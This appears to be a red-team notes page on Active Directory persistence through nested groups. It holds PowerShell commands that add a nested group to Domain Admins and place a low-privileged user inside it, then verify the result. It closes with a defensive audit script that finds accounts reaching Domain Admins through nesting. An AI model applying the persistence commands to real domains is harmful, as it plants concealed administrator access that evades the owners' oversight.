Group Persistence

Required Privileges: Administrators
SCENARIO

We have the IT group, which has two nested groups in the Internet Access group, named NestGroup-1 and NestGroup-2.


Let's add the NestGroup-2 group to the Domain Admins group.

Add-ADGroupMember -Identity "Domain Admins" -Members "NestGroup-2"

Add our low-privileged AD user to the first group, NestGroup-1.

Add-ADGroupMember -Identity "NestGroup-1" -Members "<Low Privileged AD Username>"

Verifying the Access

Our low-privileged user should now have privileged access on the domain, inherited through the nested groups. We can verify that the user is now part of the new groups with the following command.

:: Displays the User Groups to which the Current User Belongs
whoami /groups

We can verify the new members of the Domain Admins group with this command.

Get-ADGroupMember -Identity "Domain Admins"
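
Get-ADGroupMember without -Recursive lists only direct members, so the output above shows NestGroup-2 and not the account that was added to NestGroup-1. The audit below is an added example, not part of the original page: it walks the nesting and reports every account that reaches Domain Admins, with the chain of groups it came through. The sample directory, the username lowpriv.user, the helper names, and the assumption that NestGroup-1 is a member of NestGroup-2 are all constructed for illustration.

```powershell
# Constructed sample directory: group name -> direct members.
# Assumption: NestGroup-1 is nested inside NestGroup-2, as the scenario implies.
function New-Entry($Name, $Class) {
    [pscustomobject]@{ SamAccountName = $Name; objectClass = $Class }
}
$SampleDirectory = @{
    'Domain Admins' = @((New-Entry 'Administrator' 'user'), (New-Entry 'NestGroup-2' 'group'))
    'NestGroup-2'   = @((New-Entry 'NestGroup-1' 'group'))
    'NestGroup-1'   = @((New-Entry 'lowpriv.user' 'user'))   # constructed username
}

function Get-DirectMember([string]$Group) {
    # Offline stand-in. Against a live domain, replace the body with:
    #   Get-ADGroupMember -Identity $Group | Select-Object SamAccountName, objectClass
    $SampleDirectory[$Group]
}

function Get-PrivilegedPath {
    param(
        [string]$Group = 'Domain Admins',
        [string[]]$Path = @()
    )
    $Path += $Group
    foreach ($m in (Get-DirectMember $Group)) {
        if ($m.objectClass -eq 'group') {
            # Skip groups already on the path so circular nesting cannot loop forever.
            if ($Path -notcontains $m.SamAccountName) {
                Get-PrivilegedPath -Group $m.SamAccountName -Path $Path
            }
        } else {
            [pscustomobject]@{
                Account = $m.SamAccountName
                Depth   = $Path.Count            # 1 = direct member of Domain Admins
                Via     = $Path -join ' <- '
            }
        }
    }
}

# Accounts that hold Domain Admins only through nesting are the ones to review.
Get-PrivilegedPath | Where-Object Depth -gt 1 | Format-Table -AutoSize
```

Comparing this report against a saved baseline of expected paths highlights accounts whose access arrives through a chain of groups that nobody approved as privileged.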